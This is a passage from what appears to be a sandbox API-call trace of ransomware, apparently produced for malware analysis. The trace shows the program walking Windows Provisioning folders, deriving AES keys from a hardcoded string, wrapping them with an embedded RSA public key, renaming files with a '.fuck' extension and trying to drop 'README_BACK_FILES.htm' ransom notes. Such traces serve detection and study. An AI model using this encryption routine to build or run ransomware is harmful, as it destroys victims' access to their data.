users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml.fuck")) returned 0 [0240.102] CryptDestroyHash (hHash=0x28e83f8) returned 1 [0240.102] CryptDestroyKey (hKey=0x28e88b8) returned 1 [0240.102] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.102] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.102] FindClose (in: hFindFile=0x28bf218 | out: hFindFile=0x28bf218) returned 1 [0240.102] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\readme_back_files.htm")) returned 0xffffffff [0240.102] AreFileApisANSI () returned 1 [0240.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0240.102] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.103] GetLastError () returned 0x5 [0240.103] GetLastError () returned 0x5 [0240.103] FindNextFileA (in: hFindFile=0x2893fb0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.103] FindClose (in: hFindFile=0x2893fb0 | out: hFindFile=0x2893fb0) returned 1 [0240.103] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\readme_back_files.htm")) returned 0xffffffff [0240.103] AreFileApisANSI () returned 1 [0240.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0240.103] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.104] GetLastError () returned 0x5 [0240.104] GetLastError () returned 0x5 [0240.104] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.104] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e87b8 [0240.104] FindNextFileA (in: hFindFile=0x28e87b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.104] FindNextFileA (in: hFindFile=0x28e87b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.104] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.105] GetLastError () returned 0x5 [0240.105] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml")) returned 0x20 [0240.105] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0240.105] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.106] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.106] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.106] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0240.109] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.109] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.109] CryptHashData (hHash=0x28e87f8, pbData=0x2856de0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.109] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28e87f8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e8338) returned 1 [0240.109] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.109] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.109] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d3f08) returned 1 [0240.109] CryptImportPublicKeyInfo (in: hCryptProv=0x28d3f08, dwCertEncodingType=0x1, pInfo=0x28c82e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c8318*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c8320*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e85f8) returned 1 [0240.109] CryptEncrypt (in: hKey=0x28e85f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.110] CryptEncrypt (in: hKey=0x28e85f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d45f0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d45f0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.110] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d45f0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.110] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.110] CryptEncrypt (in: hKey=0x28e8338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.110] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.110] CloseHandle (hObject=0xffffffff) returned 1 [0240.110] CloseHandle (hObject=0xffffffff) returned 1 [0240.110] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml"), bFailIfExists=0) returned 0 [0240.110] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0240.111] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.gsg")) returned 0 [0240.111] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.fuck")) returned 0 [0240.112] CryptDestroyHash (hHash=0x28e87f8) returned 1 [0240.112] CryptDestroyKey (hKey=0x28e8338) returned 1 [0240.112] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.112] FindNextFileA (in: hFindFile=0x28e87b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.112] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.112] GetLastError () returned 0x5 [0240.112] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml")) returned 0x20 [0240.112] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0240.113] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.113] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.114] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.114] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0240.116] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.116] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.116] CryptHashData (hHash=0x28e8838, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.116] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28e8838, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e88b8) returned 1 [0240.116] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.116] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.116] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d3b50) returned 1 [0240.117] CryptImportPublicKeyInfo (in: hCryptProv=0x28d3b50, dwCertEncodingType=0x1, pInfo=0x28c7fa8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c7fd8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c7fe0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e82f8) returned 1 [0240.117] CryptEncrypt (in: hKey=0x28e82f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.117] CryptEncrypt (in: hKey=0x28e82f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3bd8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d3bd8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.117] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d3bd8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.117] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.117] CryptEncrypt (in: hKey=0x28e88b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.117] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.117] CloseHandle (hObject=0xffffffff) returned 1 [0240.118] CloseHandle (hObject=0xffffffff) returned 1 [0240.118] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0240.118] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0240.118] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml.gsg")) returned 0 [0240.119] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml.fuck")) returned 0 [0240.119] CryptDestroyHash (hHash=0x28e8838) returned 1 [0240.119] CryptDestroyKey (hKey=0x28e88b8) returned 1 [0240.119] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.119] FindNextFileA (in: hFindFile=0x28e87b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.120] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e89b8 [0240.120] FindNextFileA (in: hFindFile=0x28e89b8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.120] FindNextFileA (in: hFindFile=0x28e89b8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.120] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28e89f8 [0240.120] FindNextFileA (in: hFindFile=0x28e89f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.120] FindNextFileA (in: hFindFile=0x28e89f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.121] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.121] GetLastError () returned 0x5 [0240.121] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0240.121] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0240.121] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.122] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.122] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.122] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28d3f90) returned 1 [0240.125] CryptCreateHash (in: hProv=0x28d3f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.125] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.125] CryptHashData (hHash=0x28e86f8, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.125] CryptDeriveKey (in: hProv=0x28d3f90, Algid=0x6610, hBaseData=0x28e86f8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e88b8) returned 1 [0240.125] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.125] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.125] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28d4018) returned 1 [0240.125] CryptImportPublicKeyInfo (in: hCryptProv=0x28d4018, dwCertEncodingType=0x1, pInfo=0x28c72a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c72d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c72e0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e88f8) returned 1 [0240.125] CryptEncrypt (in: hKey=0x28e88f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.126] CryptEncrypt (in: hKey=0x28e88f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d42c0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28d42c0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.126] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d42c0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.126] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.126] CryptEncrypt (in: hKey=0x28e88b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.126] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.126] CloseHandle (hObject=0xffffffff) returned 1 [0240.126] CloseHandle (hObject=0xffffffff) returned 1 [0240.126] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0240.126] SetFileAttributesA (lpFileName="C:\\\\Users\\All 